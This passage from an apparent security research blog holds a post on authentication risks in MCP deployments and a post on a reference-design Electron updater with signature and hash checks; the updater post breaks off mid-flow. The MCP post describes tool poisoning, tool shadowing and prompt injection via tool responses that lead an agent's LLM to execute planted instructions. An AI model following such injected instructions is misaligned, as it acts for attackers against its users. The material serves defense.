The story is not over yet though. Besides the memory issues presented in this post, separate logical bugs in EFS were discovered and will be soon disclosed. Stay tuned!

In other news, I will be presenting more about NASA’s CFITSIO Extended Filename Syntax at BSidesLuxembourg 2026. See you there!

The MCP AuthN/Z Nightmare

2026-03-05T00:00:00+01:00

This article shares our perspective on the current state of authentication and authorization in enterprise-ready, remote MCP server deployments.

Before diving into that discussion, we’ll first outline the most common attack vectors. Understanding these threats is essential to properly frame the security challenges that follow. If you’re already familiar with them, feel free to skip to the section “Enterprise Authentication and Authorization: a Work in Progress” below.

Huge shoutout to Teleport for sponsoring this research. Thanks to their support, we have been able to conduct cutting-edge security research on this topic. Stay tuned for upcoming MCP security updates!

At this stage, introducing the Model Context Protocol (MCP) would be redundant since it has already been thoroughly covered in the recent surge of security blog posts.

For anyone who may have missed the conversation, here’s a brief recap:

MCP is a protocol used to connect AI models to data, tools, and prompts. It uses JSON-RPC messages for communication. It’s a stateful connection where clients and servers negotiate capabilities.

A high-level architecture is provided below:

References: MCP Specification and MCP Architecture

MCP Attack Vectors

Several categories of vulnerabilities pertaining to MCP have emerged in the wild. While it might not fit every bug you read about, as things are changing on a daily basis, a good starting point is the not-so-old OWASP MCP Top 10.

Below are the most relevant vulnerabilities we have encountered so far, organized by the malicious actor profile:

Malicious MCP Server

Rogue MCP servers could intentionally exploit clients with:

Tool Poisoning: The server provides malicious tool definitions or modifies them after user approval. Sub-categories and variations of the attack:
- Rug Pulls: A server presents benign capabilities during initial tools/list call, then switches to malicious ones during execution or in subsequent MCP messages
- Tool Shadowing: A malicious server injects tool descriptions that modify the agent’s behavior with respect to a trusted tool
- Schema Poisoning: Corrupting interface definitions to mislead the model. The schema is used by MCP clients to validate the tool inputs and outputs and to let the model know what is required to interrogate them
Prompt Injection via Tool Responses: The server returns malicious instructions embedded in MCP responses to normal actions, which the client’s LLM then executes
Data Exfiltration via Resources: Malicious servers exposing resources that leak sensitive client information etc.

It should be highlighted that the listed attacks are exploitable by either local or remote MCP servers. Of course, the outcome varies drastically in terms of achievable impact.
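One common client-side mitigation for rug pulls is to pin each tool definition at approval time and flag any later change. The sketch below is a minimal illustration of that idea, not part of any MCP SDK: the helper names (`fingerprintTool`, `findChangedTools`) are hypothetical, and it assumes the client fingerprints the `name`, `description`, and `inputSchema` fields of each tool.

```javascript
const { createHash } = require('node:crypto');

// Recursively sort object keys so that equal definitions serialize identically.
function canonicalize(value) {
  if (Array.isArray(value)) return value.map(canonicalize);
  if (value && typeof value === 'object') {
    return Object.keys(value).sort().reduce((acc, key) => {
      acc[key] = canonicalize(value[key]);
      return acc;
    }, {});
  }
  return value;
}

// Hypothetical helper: SHA-256 fingerprint of the fields the user approved.
function fingerprintTool(tool) {
  const pinned = {
    name: tool.name,
    description: tool.description,
    inputSchema: tool.inputSchema,
  };
  return createHash('sha256')
    .update(JSON.stringify(canonicalize(pinned)))
    .digest('hex');
}

// Returns the names of tools that are new or whose definition changed
// compared to the fingerprints stored at approval time (Map: name -> hash).
function findChangedTools(approvedFingerprints, currentTools) {
  return currentTools
    .filter((tool) => approvedFingerprints.get(tool.name) !== fingerprintTool(tool))
    .map((tool) => tool.name);
}
```

A client could run `findChangedTools` on every tools/list response and require a fresh user approval for any name it returns.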

Malicious MCP Client

Rogue MCP clients could intentionally exploit servers with:

Command Injection: Crafted MCP message inputs sent to vulnerable MCP servers that do not properly sanitize them, allowing arbitrary command execution (mostly in an old-fashioned way)
- Examples: CVE-2025-53100 (RestDB’s Codehooks.io MCP Server), CVE-2025-53818 (GitHub Kanban MCP Server)
Context Injection & Over-Sharing: Servers that do not properly isolate context, allowing exfiltration of sensitive information from other users/sessions
Prompt Injection: The MCP Server could receive malicious prompts from the client, which would then modify its behavior to execute the requested tasks
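To illustrate the command injection case, the sketch below shows the usual server-side fix: passing client input as a discrete argument to `execFileSync` instead of concatenating it into a shell string. The `echoViaChild` handler is hypothetical, and the current Node.js binary stands in for whatever external tool a real MCP server would invoke.

```javascript
const { execFileSync } = require('node:child_process');

// Hypothetical tool handler: echoes a client-supplied string via a child process.
// execFileSync does not spawn a shell by default, so metacharacters such as
// `;`, `|` or `$()` reach the child as plain text and are never interpreted.
function echoViaChild(userInput) {
  if (typeof userInput !== 'string' || userInput.length > 256) {
    throw new TypeError('userInput must be a string of at most 256 characters');
  }
  return execFileSync(
    process.execPath, // stand-in for a real external tool
    ['-e', 'process.stdout.write(process.argv[1])', userInput],
    { encoding: 'utf8' }
  );
}
```

Avoiding the shell removes one injection class only. Arguments that the target tool itself interprets as options (for example, values starting with `-`) still need tool-specific validation.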

Other Malicious Actors

Beyond the traditional client-server actors, an MCP ecosystem could also be compromised by:

MCP Proxies/Gateways: Intermediary systems (like MCP proxies) used for routing and authorization of MCP. These could alter passing MCP messages or simply be vulnerable to policy bypasses. You might be surprised by the number of MCP Gateways out there
Single-Sign-On (SSO) Intermediaries: MCP servers using OAuth 2.0/2.1 for authorization rely on discovery endpoints (.well-known/oauth-authorization-server) and dynamic client registration. Malicious actors could exploit these intermediaries by injecting fake metadata, manipulating redirect URIs, or compromising the registration endpoint to obtain unauthorized client credentials (e.g., CVE-2025-4144 - a PKCE bypass in workers-oauth-provider, CVE-2025-4143 - improper redirect_uri validation)
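As a reference point for the redirect URI issue, the sketch below shows exact-match validation against the URIs stored at client registration. The function name and the shape of the registered list are assumptions made for illustration. It is not the fix applied in any of the cited CVEs.

```javascript
// Hypothetical check run by an authorization server before redirecting.
// `registeredUris` is assumed to be the list stored at client registration.
function isRedirectUriAllowed(requestedUri, registeredUris) {
  let parsed;
  try {
    parsed = new URL(requestedUri);
  } catch {
    return false; // not an absolute URI
  }
  if (parsed.hash !== '') return false; // reject redirect URIs carrying a fragment
  // Exact string comparison: no prefix, wildcard, or normalization-based matching.
  return registeredUris.includes(requestedUri);
}
```

Prefix or pattern matching is where most redirect URI bypasses originate, which is why the sketch compares the raw strings.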

The Nightmare: New Actors, New Problems to Solve

Securing SSO remains an open challenge for the industry due to its intrinsic complexity. The past few years have highlighted this reality, with a steady stream of severe vulnerabilities affecting OAuth2, OIDC, SAML and SCIM implementations.

Yet, progress never stops and authentication & authorization in MCP are the new inevitable nightmare. Because MCP is a relatively new protocol, the standards for how clients and servers should establish trust are still evolving, leading to a fragmented ecosystem.

The specifications for AuthN/AuthZ are subject to continuous changes and extensions, as is common for newborn protocols. This instability means that today’s “secure and compliant” implementation might be deprecated or insufficiently secure tomorrow.

Just a few of the latest Specification Enhancement Proposals (SEPs) in MCP

Multiple significant issues have been emerging in the MCP SSO implementation, many as descendants of the common OAuth2/OIDC vulnerabilities, but also new ones.

We have seen browser-based clients or open() URL handlers exploited to launch arbitrary processes or redirect to malicious servers, showing the fragility of the MCP client-side implementation, often linked to automatic action executors.

Then, attacks against the new metadata discovery and old-school metadata endpoints:

Protected Resource Metadata (PRM) documents injected with malicious URI schemes
OIDC Discovery endpoints manipulated to redirect flows

Notable mentions around the cited scenarios are: CVE-2025-6514, “From MCP to Shell”, CVE-2025-4144, CVE-2025-4143, CVE-2025-58062

Furthermore, many implementations (like IDE extensions and CVE-2025-49596) assumed localhost was secure, starting WebSocket servers without auth, allowing any local process (or malicious website via DNS rebinding) to connect.
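A typical defense against DNS rebinding on local servers is to validate the Host and Origin headers before accepting a connection. The following is a minimal sketch under stated assumptions: the function name, the port, and the origin allowlist are all hypothetical, and the check complements authentication on the local server rather than replacing it.

```javascript
// Hypothetical pre-connection check for a server bound to the loopback interface.
// `headers` is assumed to use lowercase keys, as Node's http module provides.
function isTrustedLocalRequest(headers, port, allowedOrigins = []) {
  const allowedHosts = new Set([
    `localhost:${port}`,
    `127.0.0.1:${port}`,
    `[::1]:${port}`,
  ]);
  const host = String(headers.host || '').toLowerCase();
  // A rebinding attack reaches the server with the attacker's hostname in Host.
  if (!allowedHosts.has(host)) return false;
  // Non-browser clients usually send no Origin header.
  if (headers.origin === undefined) return true;
  // Browser requests must come from an explicitly allowed origin.
  return allowedOrigins.includes(headers.origin);
}
```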

While keeping up with the latest news is pretty complex, time consuming and not always possible, we attempted to sum up the potential injection points affecting the current MCP Authentication via OAuth2 and dynamic client registration.

A Scary Sequence Diagram

The monolith sequence diagram below embodies the title of this post. It should serve as a reminder of how extensive the attack surface is and how many injection points exist. One could argue that “every step is an injection point” and that would not be inaccurate. However, the goal here is to illustrate the full length of the authorization flow, from start to finish, highlighting the many branches, variations, and opportunities for subtle yet impactful vulnerabilities.

The high-resolution PDF file can be downloaded here.

While prompt injection requires a different approach, most of the injection points and impactful outcomes, such as LFI, RCE, etc. could be prevented by strictly applying sanitization and validation of the inputs. Still, the monolith highlights how complex it is to do so, given the length and variety of actors throughout the entire flow.

Enterprise Authentication and Authorization: a Work in Progress

In the OAuth specification, there is scope consent by the user at the time of authorization.

The user HAS to see and approve the exact scopes for each third-party tool/app/etc. before any token is issued by the IdP.

Currently, there is no homogeneous way to manage MCP security across an enterprise. While individual MCP tools struggle with authentication and often just rely on secret tokens, the Enterprise-level authN/Z is a whole other challenge.

In fact, in enterprise-managed authorization the scope consent is decoupled from the time of authorization.

As an example, an MCP client with enterprise authorization could be accessing Slack and GitHub on behalf of the user, but the user never explicitly consented to github:read slack:write in a consent screen. The local agent decided the task and the scopes required, and the enterprise policy enforcement decided to allow it on behalf of the user based on their MCP Client identity.

Down that path, there is intermediary tooling trying to offer a partial solution, such as MCP Proxies/Gateways. While they are extremely useful at aggregating MCP servers under the same centrally-managed authentication and authorization layer, they still do not solve the problem arising with dynamic scopes and plug-and-play third-party tools/apps.

On the other side, there are active discussions around a native Enterprise-Managed Authorization Extension for the Model Context Protocol. During our research on the matter, we had the opportunity to do a deep dive into a current draft of the extension, which relies on the Identity Assertion JWT Authorization Grant (JAG). Given our exposure to real-life security engineering challenges faced by our clients, we decided to take a step further and offer our feedback on the draft. We strongly suggest reading the Extension Draft and Doyensec’s pull-request with the updated Security Considerations.

The JAG Problem (Identity Assertion JWT Authorization Grant)

The following summarizes the JAG approach and our considerations. For readers interested in understanding all the aspects in great depth, we would recommend reading the full draft before continuing.

The main idea of this specification revolves around leveraging existing Enterprise Identity Providers (IdPs), such as Okta or Azure AD.

The flow’s key-points are:

The current specification introduces a few outstanding challenges:

1. Access Invalidation Problem

There are three levels of tokens issued throughout a correct execution of the flow:

ID Token from IdP
ID Token For the Grant (JAG ID) from IdP
MCP Access Token from the MCP Authorization Server

The proposed specification does not explicitly describe mechanisms for invalidating access to an MCP client or revoking issued tokens / ID-JAG.

MCP-Specific Note: While access invalidation is also unspecified in the parent RFCs, the high risk associated with non-deterministic agentic access to tools and resources should require an access invalidation flow for the Enterprise context. Otherwise, the enterprise processes being authorized with the above-mentioned spec would not have a clear emergency recovery pattern whenever agents start misbehaving (e.g., injections and other widely known attacks). Consequently, every actor could end up proposing its own recovery pattern, bringing ambiguity and implementation differences.

2. LLM Scope Abuse Without User Consent

In JAG, the IdP issues an ID Token with no scopes embedded. It just states the identity of the user to allow impersonation from the MCP client. When the MCP client requests a JAG for high-risk scopes like github:write slack:write, no consent pop-up is triggered. The enterprise policy decides on behalf of the user being impersonated.

MCP-Specific Note: While this is totally normal in a classic Machine-to-Machine (M2M) environment where the enterprise users are expected to be directly mandating specific tasks on their behalf to automation software, that standard does not apply to the MCP field.

The list of tasks and actions transformed into MCP interactions is not deterministically chosen by the end user.

In general, the consent requirement bypass offered by JAG would allow LLMs to autonomously request any scope permitted by enterprise policies, even if it’s irrelevant to the user’s current task, removing the human-in-the-loop for high-risk actions.

3. How the IdP Creates, Distributes and Validates Clients

Within the JAG proposal, it is not declared how the IdP should issue/distribute client credentials (secret vs. private-key JWT vs. mTLS, how they’re delivered, rotation, etc.).

Moreover, it is not declared how important it is for the IdP to ensure that the audience (The Issuer URL of the MCP server’s authorization server) is linked to the resource (The RFC9728 Resource Identifier of the MCP server).

MCP-Specific Note: While such a practice is unspecified in the parent specifications, enterprise architectures are usually based on multiple IdPs managing access to a wide range of resources, often overlapping: e.g., both IdP A and IdP B can authorize access to app C. Within the presented Enterprise MCP scenario, multiple IdPs could be authorizing multiple MCP Authorization Servers (often overlapping), while each of them manages scopes for a range of MCP Servers.

In such a context, clearly defining namespaces and required checks on IdPs and MCP Authorization Servers would help prevent implementation issues like:

Scope Namespace Collision: If Server A and Server B both use common scope names like files:read, admin:write, etc., the attacker could leverage a low-privilege ID-JAG from Server B to gain access to Server A if aud is not checked to be the Authorization Server and the resource as one of the MCP Servers managed by the specific MCP Authorization Server

Resource Identifier Injection: If the MCP Authorization Server doesn’t validate that the resource claim in the ID-JAG matches one of its own registered resource identifiers, it cannot distinguish between ID-JAGs intended for different servers. Once an MCP session is obtained, the injected value could be lost and irrelevant, allowing cross-access.

The IdP must ensure that JAGs for resources not managed by the caller client are not forged.
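The checks discussed above could look like the following sketch on the MCP Authorization Server side. It assumes the ID-JAG signature has already been verified and that the decoded claims expose `aud`, `resource`, and `exp`. The function name and the configuration shape (`issuer`, `resources`) are hypothetical and not taken from the draft.

```javascript
// Hypothetical claim validation, run only after the ID-JAG signature is verified.
// `config.issuer` is this authorization server's issuer URL and
// `config.resources` lists the MCP server resource identifiers it manages.
function validateIdJagClaims(claims, config, now = Math.floor(Date.now() / 1000)) {
  const errors = [];
  // `aud` may be a string or an array; require exactly one value, ours.
  const audiences = [].concat(claims.aud ?? []);
  if (audiences.length !== 1 || audiences[0] !== config.issuer) {
    errors.push('aud does not identify this authorization server');
  }
  // The resource must be one of the MCP servers this server is responsible for.
  if (typeof claims.resource !== 'string' || !config.resources.includes(claims.resource)) {
    errors.push('resource is not managed by this authorization server');
  }
  if (typeof claims.exp !== 'number' || claims.exp <= now) {
    errors.push('assertion is expired or has no exp');
  }
  return errors; // an empty array means the claims passed these checks
}
```

Binding the issued access token to the validated `resource` value, rather than discarding it after session creation, is what keeps the check meaningful later in the flow.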

4. ID-JAG Replay Concern

Whenever a single ID-JAG can mint multiple MCP Server access tokens, and those access tokens can invoke high-impact tools, the ID-JAG becomes an amplifier of damage. That is why the requirement to enforce single-use checks on the jti should be part of the specification itself.
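A single-use check on the jti can be sketched as a small replay cache. The example below is a minimal in-memory illustration with a hypothetical class name. A real deployment would likely need a store shared across all authorization server instances.

```javascript
// Hypothetical in-memory replay cache keyed by jti.
// Entries are kept until the assertion's own expiry, then purged.
class JtiReplayCache {
  constructor() {
    this.seen = new Map(); // jti -> exp (seconds since epoch)
  }

  // Returns true the first time a non-expired jti is presented, false otherwise.
  consume(jti, exp, now = Math.floor(Date.now() / 1000)) {
    for (const [id, expiry] of this.seen) {
      if (expiry <= now) this.seen.delete(id); // expired assertions are rejected anyway
    }
    if (typeof jti !== 'string' || jti === '') return false;
    if (typeof exp !== 'number' || exp <= now) return false;
    if (this.seen.has(jti)) return false; // replay
    this.seen.set(jti, exp);
    return true;
  }
}
```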

Conclusion

Authentication and authorization, especially in the context of SSO and transitive trust across third parties, have historically been a breeding ground for subtle, high-impact vulnerabilities. MCP does not change this reality. If anything, by introducing additional layers of indirection, remote server pooling, and agent-driven workflows, it amplifies the existing complexity. In the near term, we should expect AuthN/Z in MCP deployments to remain a challenging and error-prone domain.

For this reason, both auditors and developers should apply the strictest possible validation at every step of any SSO flow involving MCP. Token issuance, audience binding, scope enforcement, session propagation, identity mapping, trust establishment, and revocation logic all deserve explicit scrutiny. The end-to-end sequence diagram presented in this article is intended as a practical starting point: a tool to reason about the full authorization chain, enumerate trust boundaries, and systematically derive a security test plan. Every transition in that flow should be treated as a potential injection point or trust confusion opportunity.

When it comes to enterprise-managed authorization models, approaches such as JAG raise significant concerns. They introduce complex cross-specification dependencies, expand the number of actors involved in trust decisions, and substantially widen the attack surface. More critically, the model’s reliance on full user impersonation by non-deterministic agents, capable of autonomously selecting and executing tasks without explicit per-action user consent, is misaligned with MCP’s security requirements. Delegation without tight contextual constraints is indistinguishable from privilege escalation when boundaries are not rigorously enforced.

Based on our experience, a more robust direction for enterprise MCP deployments would emphasize strong, explicit trust anchors and protocol minimization. Technologies such as certificate-based authorization and mTLS, adapted specifically to MCP’s interaction model, provide clearer security properties and reduce ambiguity in identity binding. These mechanisms should be complemented by:

Explicit protections for high-risk or irreversible actions
Uniform and centralized access invalidation mechanisms for incident response and disaster recovery
Strict resource namespacing and deterministic scope mapping
Clear separation between user delegation and agent execution contexts

In short, the goal should not be to replicate the full complexity of traditional enterprise SSO stacks inside MCP, but to reduce implicit trust, constrain delegation semantics, and make authorization decisions auditable and deterministic.

If the industry has learned anything from the past decade of OAuth, OIDC, SAML, and SCIM vulnerabilities, it is that complexity without strong invariants inevitably leads to security gaps. MCP deployments would do well to internalize that lesson early.

Building a Secure Electron Auto-Updater

2026-02-16T00:00:00+01:00

Introduction

In cooperation with the Polytechnic University of Valencia and Doyensec, I spent over six months of my internship on research that combines theoretical foundations in code signing and secure update designs with a practical implementation of these learnings.

This motivated the development of SafeUpdater, a macOS updater vaguely based on the update mechanisms used by Signal Desktop, but otherwise designed as a modular extension.

SafeUpdater is a package designed for macOS systems, but its interfaces are easily extensible to both Windows and Linux.

Please note that “SafeUpdater” is not intended to be used as a general-purpose package, but as a reference design illustrating how update mechanisms can be built around explicit threat models and concrete attack mitigations.

⚠️ This software is provided as-is, is not intended for production use, and has not undergone extensive testing.

The State of Electron Auto-Updates

A software update is the process by which improvements, bug fixes, or changes in functionality are incorporated into an existing application. This process is crucial for maintaining the security of the app, improving performance, and ensuring compatibility with different systems. Because updates are central to both the maintenance and evolution of software, the update mechanism itself becomes one of the most sensitive points from a security perspective.

In Electron applications, an updater typically runs with full user privileges, downloading executable code from the Internet, and may install it with little or no user interaction. If this mechanism is compromised, the result is effectively a remote code execution channel.

Being one of the most widely used application frameworks for desktop apps, Electron also represents one of the most attractive targets for attackers. While the official framework update mechanism provides a ready-to-use solution for most applications, it doesn’t protect against certain classes of attacks.

Currently, there are two main solutions for implementing an auto-update system in ElectronJS:

autoUpdater

The first is the built-in auto-updater module provided by Electron itself. This module handles the basic workflow of checking if there are updates available, downloading the update, and applying it, using standard HTTP(S) and relying on code signing and framework-specific metadata for file integrity.

One of the simplest ways to use it is with update-electron-app, a Node.js drop-in solution that is based on Electron’s standard autoUpdater method without changing its underlying security assumptions. The following code snippet shows an example of its implementation:

const { updateElectronApp, UpdateSourceType } = require('update-electron-app')
updateElectronApp({
  updateSource: {
    type: UpdateSourceType.StaticStorage,
    baseUrl: `https://my-bucket.s3.amazonaws.com/my-app-updates/${process.platform}/${process.arch}`
  }
})

This module builds on top of Electron’s autoUpdater, providing a higher-level interface:

  autoUpdater.setFeedURL({
    url: feedURL,
    headers: requestHeaders,
    serverType,
  });

electron-updater

The second solution is using Electron-Builder’s electron-updater library, which offers a more integrated approach for managing application updates. When the application is built, a release file named latest.yml is generated, containing metadata about the latest version. This file and the build artifacts are then uploaded to the configured distribution target.

The developer is responsible for integrating the updater into the application lifecycle and configuring the update workflow.

Differences between “autoUpdater” and “electron-updater”

Feature	Electron Official (`autoUpdater`)	Electron-Builder (`electron-updater`)
Publication server requirement	Requires self-hosted update endpoints	Uses built-in providers (e.g. GitHub Releases)
Code signature validation	macOS only	macOS and Windows (custom and OS validation)
Metadata and artifact management	Manual upload of metadata and artifacts required	Automatically generates and uploads release metadata and artifacts
Staged rollouts	Not natively supported	Natively supported
Supported providers	Custom HTTP(S) only	Multiple providers (GitHub Releases, Amazon S3, and generic HTTP servers)
Configuration complexity	Higher, especially with a custom server	Minimal configuration
Cross-platform compatibility	Platform-specific tools (Squirrel.Mac, Squirrel.Windows)	Unified cross-platform support (Windows, macOS, Linux)

Now that we have a clear picture of the software update mechanisms available in ElectronJS today, we can shift our focus to two specific threats that are not mitigated by any of the existing open-source solutions. It is worth noting that most of the considerations discussed here are not specific to ElectronJS itself, but apply more broadly to software updaters for desktop applications in general.

At the core of these issues lies a fundamental limitation of modern operating systems: the lack of a reliable, built-in mechanism to fully validate the integrity of the software currently running on the system. While macOS, thanks to its relatively closed ecosystem, does provide native capabilities such as code signing and notarization to help verify software integrity at runtime, this is not the case on Windows. As a result, Windows applications cannot rely on the operating system alone to assert that the updater or the application binary has not been tampered with.

Because of this gap, software updaters must implement additional safeguards and workarounds to compensate for the missing integrity guarantees. These compensating controls are often complex, error-prone, and inconsistently applied across projects, which ultimately leaves room for entire classes of attacks that remain unaddressed even in the most popular desktop applications.

The Missing Threats

In all software updater implementations, the following assets are considered critical and must be protected:

Update Binary: The new version of the application to be installed
Update Manifest: Contains metadata such as version number, hashes, and file locations
Signing Keys: Cryptographic keys used to sign update binaries and manifests
Distribution Channel: The method used to deliver updates to the client (e.g., a dedicated update server, an S3 bucket, or a CDN).

In this post, we focus only on the threats that are not mitigated by the default ElectronJS software update mechanisms. In fact, given the absence or limited capabilities around software integrity checks at the OS level, the following threats remain unaddressed:

Attacks Summary

Threat	Attack Vector	Threat Actor	Potential Impact
Downgrade (Rollback) Attack	Manipulation of update manifest or version metadata to serve older releases	Malicious third party, MITM (Man-in-The-Middle), compromised server	Reintroduction of known vulnerabilities
Integrity Attack	Tampering with update binaries, installers, or metadata	MITM (Man-in-The-Middle), compromised CDN, update server, or build pipeline	Arbitrary code execution
Race Condition Attack	Replacing verified update files between verification and installation	Local attacker with system access	Execution of malicious code, privilege escalation
Untested Version Attack	Serving signed but non-production (alpha/beta/dev) builds via update channel	Malicious third party, MITM (Man-in-The-Middle), insider threat	Exposure to unreviewed features, debug functionality, or new vulnerabilities

1- Downgrade (Rollback) Attack

A downgrade attack occurs when an attacker forces the application to install an older, vulnerable version instead of the latest secure release. This may happen by compromising the update server, or by intercepting traffic via a MITM (Man-in-The-Middle) attack and modifying the update manifest to offer a lower version.

The attacker’s objective is to reintroduce previously fixed vulnerabilities by deploying an outdated version of the application. Once installed, the attacker can exploit these known weaknesses.

Attack Steps:

The attacker manipulates the update mechanism to force the application to download and install an older, vulnerable version (Downgrade Attack).
A version is selected where known security flaws remain unpatched.
After installation, the attacker exploits a known vulnerability to compromise the system.

2- Integrity Attack

An integrity attack involves the unauthorized modification of update artifacts, such as binaries, installation packages, or metadata, either at rest or during transmission. The attacker’s goal is to have the system execute altered code while believing it originates from a trusted source.

Attack Steps:

The attacker modifies the update package or metadata through a compromised distribution channel (e.g., CDN, update server, or build pipeline), or via a MITM attack in the absence of proper transport security.
The client downloads the modified update, assuming it is legitimate.
The altered package is installed and executed.
The attacker gains arbitrary code execution.

3- Race Condition Attack

A race condition attack occurs when multiple processes access and modify shared resources concurrently, and the final outcome depends on the timing of those operations. In the context of software updates, this may allow an attacker with local access to replace or modify update files between verification and installation.

This attack requires the attacker to have access to the victim’s machine. While this may appear unlikely, multi-user systems or shared environments make this a realistic threat.

A practical case occurs when the attacker has access to the temporary directory where the update files are stored. This attack is possible whenever signature verification and update application are not performed atomically on the same file descriptor.

Attack Steps:

The application downloads the update to a temporary directory.
The update’s signature and hash are verified.
Before installation, the attacker replaces the verified file with a malicious one.
The application attempts to apply the modified update.
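One way to narrow the window between steps 2 and 4 is to open the file once and verify and consume the same bytes. The sketch below illustrates the idea with a hypothetical `readVerified` helper. It assumes the update fits in memory and that the installer works from the returned buffer instead of re-opening the path.

```javascript
const fs = require('node:fs');
const { createHash } = require('node:crypto');

// Hypothetical helper: reads an update through a single file descriptor and
// returns its contents only if the SHA-512 digest matches the expected value.
function readVerified(filePath, expectedSha512Base64) {
  const fd = fs.openSync(filePath, 'r');
  try {
    // Reading via the descriptor means a later swap of the path has no effect
    // on the bytes that are hashed and returned here.
    const contents = fs.readFileSync(fd);
    const actual = createHash('sha512').update(contents).digest('base64');
    if (actual !== expectedSha512Base64) {
      throw new Error('Integrity check failed');
    }
    return contents; // install from this buffer, not from filePath
  } finally {
    fs.closeSync(fd);
  }
}
```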

4- Untested Version Attack

An untested version attack occurs when an attacker causes the client to install a development, pre-production, or experimental version of the application (e.g., alpha or beta) instead of a stable production release. This typically occurs when development and production releases are not cryptographically separated, for example when the same signing keys or update channels are shared across environments.

Although such versions may be signed, they often contain unreviewed features, experimental dependencies, or debug functionality that introduces new vulnerabilities.

Attack Steps:

The attacker intercepts the update request.
A signed but non-production version is served.
The client installs the update without distinguishing between environments.

As a result, the client fails to distinguish between production and non-production releases at a cryptographic or policy level.
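A policy-level separation can be sketched as a check on a signed channel label plus the version format. The `channel` field and the function names below are hypothetical. The check is only meaningful if the channel value is covered by the release signature, ideally with separate signing keys per environment.

```javascript
// Production versions are assumed to be plain MAJOR.MINOR.PATCH, with no
// pre-release suffix such as -alpha.1 or -beta.
function isProductionVersion(version) {
  return /^\d+\.\d+\.\d+$/.test(version);
}

// Hypothetical policy check: `release.channel` must match the client's channel,
// and production clients additionally refuse pre-release version strings.
function acceptRelease(release, clientChannel) {
  if (release.channel !== clientChannel) return false;
  if (clientChannel === 'production' && !isProductionVersion(release.version)) {
    return false;
  }
  return true;
}
```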

SafeUpdater

Our SafeUpdater is built around a set of core security mechanisms designed to protect the update process against the impact of attacks such as downgrade attacks, integrity violations, man-in-the-middle interference, and local race conditions. Each mechanism addresses a specific set of threats identified in the threat model.

The updater is designed to integrate with Electron Builder for application builds; however, this integration is optional, as the manifest can be generated independently.

1. Ed25519 Signature Verification

All update components are cryptographically signed using Ed25519, a modern elliptic-curve signature scheme known for its strong security guarantees. By verifying signatures using a public key embedded in the application, SafeUpdater ensures that update manifests and binaries are from a trusted source and haven’t been tampered with. Any modification to a signed file makes the signature check fail, causing the update to be rejected.

The deterministic message signing is composed of:

SHA-256(file) + version

This prevents unauthorized downgrade attacks by cryptographically binding the update to a specific version identifier.

Once the update asset is received, a signing message is generated. This message will later be used to verify the corresponding signature file:

async function generateMessage(updatePackagePath, version) {
  const hash = await _getFileHash(updatePackagePath);
  const messageString = `${Buffer.from(hash).toString('hex')}-${version}`;
  
  return Buffer.from(messageString);
}

Once the message is generated, the signature provided alongside the update file is verified against it. The verification uses the public key associated with the application’s signing infrastructure. If the signature does not match, the update is rejected, preventing malicious modifications from being applied:

export async function verify(publicKeyBuffer, messageBuffer, signatureBuffer) {
  return ed.verify(signatureBuffer, messageBuffer, publicKeyBuffer);
}
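To see the version binding end to end, the sketch below signs and verifies the same `${sha256Hex}-${version}` message format using Node's built-in crypto module. This is a swapped-in illustration rather than SafeUpdater's own code, which uses a separate `ed` library. The key pair is generated on the fly and the helper names are hypothetical.

```javascript
const { createHash, generateKeyPairSync, sign, verify } = require('node:crypto');

// Builds the message that binds the file contents to a version identifier.
function buildMessage(fileContents, version) {
  const sha256Hex = createHash('sha256').update(fileContents).digest('hex');
  return Buffer.from(`${sha256Hex}-${version}`);
}

// Hypothetical verifier: true only if the signature covers this file AND version.
function isValidUpdate(fileContents, version, signature, publicKey) {
  // For Ed25519 keys, the algorithm argument must be null.
  return verify(null, buildMessage(fileContents, version), publicKey, signature);
}

// Demo key pair; a real release pipeline would keep the private key offline.
const { publicKey, privateKey } = generateKeyPairSync('ed25519');
const updatePackage = Buffer.from('example update package');
const signature = sign(null, buildMessage(updatePackage, '1.2.0'), privateKey);
```

Because the version is part of the signed message, presenting the same signed file under a different version string makes verification fail, as does any change to the file itself.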

2. SHA-512 Integrity Checks

In addition to signature verification, SafeUpdater checks the SHA-512 hash of the downloaded update binaries. The expected hash is stored in the signed update manifest and compared against the hash of the downloaded file. This layered approach ensures end-to-end integrity and protects against accidental corruption as well as intentional binary tampering during transmission or storage.

// Verify file integrity
const computedHash = createHash('sha512').update(fileContents).digest('base64');
if (computedHash !== expectedSHA512) {
  throw new Error('Integrity check failed');
}

3. Immutable Version Manifests

Update metadata is distributed through an immutable version manifest that describes available releases, including version numbers, file locations, and cryptographic hashes. Since these manifests are signed, an attacker cannot tamper with them to reintroduce vulnerable versions or to point clients to a malicious location.

4. Secure Temporary File Handling

To mitigate local attacks such as race conditions (TOCTOU vulnerabilities), SafeUpdater stores temporary update files in restricted directories with owner-only permissions. Verification and installation operate on the same file path, which limits opportunities for tampering. However, these steps are not fully atomic (for example, they do not verify and install using the same file descriptor), so complete elimination of time-of-check to time-of-use risks is not guaranteed.
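The restricted temporary storage described above can be sketched as follows. This is an illustration under assumptions, not SafeUpdater's actual implementation: the helper name and the `update-` prefix are hypothetical, and the permission bits only apply on POSIX systems such as macOS and Linux.

```javascript
const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');

// Hypothetical helper: writes an update file into a fresh, owner-only directory.
function writePrivateTempFile(fileName, contents) {
  // mkdtemp creates a uniquely named directory with mode 0700 on POSIX.
  const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'update-'));
  // basename() prevents a crafted file name from escaping the directory.
  const filePath = path.join(dir, path.basename(fileName));
  // 'wx' fails if the file already exists; 0o600 restricts access to the owner.
  fs.writeFileSync(filePath, contents, { mode: 0o600, flag: 'wx' });
  return filePath;
}
```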

Update Flow Overview

SafeUpdater ensures secure and reliable updates for Electron applications. This update lifecycle follows a structured process from version check to installation:

1. Start & Scheduling

The application schedules periodic polling for updates
An initial update check is triggered immediately on launch

2. Checking for Updates

Fetch the manifest from the server
Verify the manifest’s signature to ensure authenticity
Parse available versions, and if downgrades are allowed, show a version selection UI
Fetch the metadata for the selected version
Download and verify the metadata signature
Parse metadata to extract files, SHA-512 hashes and vendor-specific information
Return the update information or determine no update is needed
If explicitly enabled by the developer for operational or recovery purposes, a controlled version selection UI is presented to allow authorized downgrades

3. Downloading Updates

Check the cache for existing update files
Verify cached files using SHA-512 hashes
If needed, download update files from the server:
- Update package (ZIP or DMG)
- Signature file
Write files to a temporary directory with write permissions only for the owner
Return update file path and signature for verification

4. Verifying Signatures

Load the public key from configuration
Compute a SHA-256 hash of the update file
Construct a signature message: ${sha256Hex}-${version}
Verify the Ed25519 signature against the message
Reject the update if the signature is invalid

5. Installing the Update

Determine whether installation is silent or interactive
